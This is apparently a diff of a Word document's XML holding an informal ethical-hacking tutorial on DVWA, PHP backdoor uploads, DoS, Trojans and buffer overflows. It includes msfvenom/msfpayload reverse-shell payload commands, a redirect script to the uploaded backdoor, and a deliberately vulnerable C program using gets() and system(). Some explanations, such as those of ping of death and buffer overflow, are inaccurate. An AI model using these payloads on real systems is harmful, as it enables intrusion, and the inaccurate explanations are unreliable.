+        <w:t xml:space="preserve">that few of the site have tools that block the cloning of websites. To get around this we need to use </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>certificate(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>obviously a fake one) to bluff.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9977,17 +11542,38 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like an server and allows us to attack it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more simple .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The OWASP pages can be accesses from the web browser for different attacks. The DVWA(damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
+        <w:t xml:space="preserve">Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>an</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> server and allows us to attack it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>simple .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The OWASP pages can be accesses from the web browser for different attacks. The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>DVWA(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10016,12 +11602,50 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Solution: Validate the uploads and the entries in the text areas before taking in.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This is done in similar fashion to java and windows payload attacks. Here we will be creating a php file instead of a .exe file and upload it to the we site. This when execute will open the backdoor to the attacker.</w:t>
+        <w:t xml:space="preserve">Solution: Validate </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>the uploads</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and the entries in the text areas before taking in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This is done in similar fashion to java and windows payload attacks. Here we will be creating a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file instead of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> .exe file and upload it to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>we</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> site. This when execute will open the backdoor to the attacker.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10040,19 +11664,79 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">msfvenom –p php/meterpreter/reverse_tcp </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> lhost=ip lport=port </w:t>
-      </w:r>
-      <w:r>
-        <w:t>–f raw&gt;filename.php</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –p </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lhost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">=port </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–f raw&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>filename.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
@@ -10065,8 +11749,71 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp lhost=ip lport=port R &gt;filename.php </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msfpayload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lhost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=port R &gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>filename.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10076,8 +11823,21 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>note that that the system is going to say msfpayload is deprecated but it still works.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>note</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> that that the system is going to say </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfpayload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is deprecated but it still works.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10097,15 +11857,53 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>&lt;script&gt; window.location=</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>script</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>window.location</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
       </w:r>
       <w:hyperlink w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>http://ipofserver(192.168.1.107 in my case)/dvwa/hackable/uploads/filename.php</w:t>
+          <w:t>http://ipofserver(192.168.1.107 in my case)/</w:t>
         </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>dvwa</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>/hackable/uploads/</w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>filename.php</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
       </w:hyperlink>
       <w:r>
         <w:t>&lt;script&gt;</w:t>
@@ -10200,8 +11998,13 @@
           <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>http Trojan: Through https and http.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Trojan: Through https and http.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10224,8 +12027,13 @@
           <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>Netcat: Not a Trojan but acts like a Trojan.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: Not a Trojan but acts like a Trojan.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10263,7 +12071,7 @@
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/diagram">
-                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId123" r:lo="rId124" r:qs="rId125" r:cs="rId126"/>
+                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId122" r:lo="rId123" r:qs="rId124" r:cs="rId125"/>
               </a:graphicData>
             </a:graphic>
           </wp:inline>
@@ -10333,8 +12141,13 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t>Polymorhicuiws: This encrypts itself. Basically this encrypts the programs again and again so that it does not work anymore.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Polymorhicuiws</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: This encrypts itself. Basically this encrypts the programs again and again so that it does not work anymore.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10349,8 +12162,13 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Cavity Virus: Empties a space on memory leaving a void. This deletes randomly some part of the memory leading to loss of files and programs stop working .</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Cavity Virus: Empties a space on memory leaving a void. This deletes randomly some part of the memory leading to loss of files and programs stop </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>working .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10617,7 +12435,7 @@
       <w:r>
         <w:t xml:space="preserve">Obviously there is so much to learn in everything so take a look at the tutorials point website: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId128" w:history="1">
+      <w:hyperlink r:id="rId127" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10627,9 +12445,11 @@
       </w:hyperlink>
     </w:p>
     <w:p>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Tools :</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10656,8 +12476,21 @@
           <w:numId w:val="31"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>Prorat: It’s a RAT{Remote access Trojan}. Used for getting a remote access to a target system.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Prorat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: It’s a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>RAT{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Remote access Trojan}. Used for getting a remote access to a target system.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10682,7 +12515,17 @@
         <w:t xml:space="preserve"> main aim is to stop your server from responding to actual </w:t>
       </w:r>
       <w:r>
-        <w:t>request from the users. So this will cause a damage to your business. Ex-Suppose if you’re a online ecommerce site. The attacker can send a huge amount of requests to your server overwhelming it so that it can’t respond to any of the actual request from your users. This will obviously cause a damage to your business.</w:t>
+        <w:t xml:space="preserve">request from the users. So this will cause a damage to your business. Ex-Suppose if you’re </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> online ecommerce site. The attacker can send a huge amount of requests to your server overwhelming it so that it can’t respond to any of the actual request from your users. This will obviously cause a damage to your business.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10731,8 +12574,21 @@
           <w:numId w:val="32"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>Fraggle: Same as smurf but instead TCP it sends only UDP packets.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Fraggle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: Same as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smurf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> but instead TCP it sends only UDP packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10743,8 +12599,13 @@
           <w:numId w:val="32"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>PIngOfDeath: The TCP packet can be a maximum of 64 kilobyte. Packet size larger 64k are sent, this is called ping of death.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PIngOfDeath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: The TCP packet can be a maximum of 64 kilobyte. Packet size larger 64k are sent, this is called ping of death.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10772,7 +12633,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>SYN flood: we have seen the basic DOS attack. It is named as syn flood attack. In this the handshake never actually occurs.</w:t>
+        <w:t xml:space="preserve">SYN flood: we have seen the basic DOS attack. It is named as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>syn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> flood attack. In this the handshake never actually occurs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10784,7 +12653,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>LAND flood : Similar to SYN flood , instead of SYN packets we use ACK packets. We can say here that actually the server started the handshake.</w:t>
+        <w:t xml:space="preserve">LAND </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>flood :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Similar to SYN flood , instead of SYN packets we use ACK packets. We can say here that actually the server started the handshake.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10820,13 +12697,29 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> h</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ping </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and crazypinger etc.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>crazypinger</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> etc.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10860,7 +12753,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the Buffer(RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
+        <w:t xml:space="preserve">Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Buffer(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10884,10 +12785,26 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what is it looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
-      </w:r>
-      <w:r>
-        <w:t>it is received from the CPU so instead of checking , it will directly executes as a command.</w:t>
+        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>is it</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">it is received from the CPU so instead of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>checking ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> it will directly executes as a command.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10903,19 +12820,34 @@
     <w:p/>
     <w:p/>
     <w:p>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Buffer.c</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>#include&lt;stdio.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Void main()</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#include&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stdio.h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>main()</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10925,8 +12857,13 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Char * name ;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Char * </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>name ;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -10934,48 +12871,163 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>name = (char *)malloc(10);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>command=(char*)malloc(30);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>printf(“Address of name is :%d”,name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>printf(“address of command is:%d”,command);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>printf(“Difference between addresses:%d”, command –name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>printf(“Enter your name :”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>gets(name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>printf(“hello! %s\n”,name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>system(command);</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = (char *)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malloc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(10);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=(char*)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malloc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(30);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>“Address of name is :%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>d”,name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>“address of command is:%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>d”,command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>“Difference between addresses:%d”, command –name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>“Enter your name :”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>gets(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>“hello! %s\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>n”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>,name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>system(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>command);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10992,7 +13044,23 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into command . so when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
+        <w:t xml:space="preserve">Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>command .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>so</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -11007,19 +13075,54 @@
       <w:r>
         <w:t xml:space="preserve"> There is every possibility that we can tamper with the requests over the data. We can use tools like </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">tamperdata or tampermonkey </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to tamper with the requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use tamperdata while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>tamperdata</w:t>
+      </w:r>
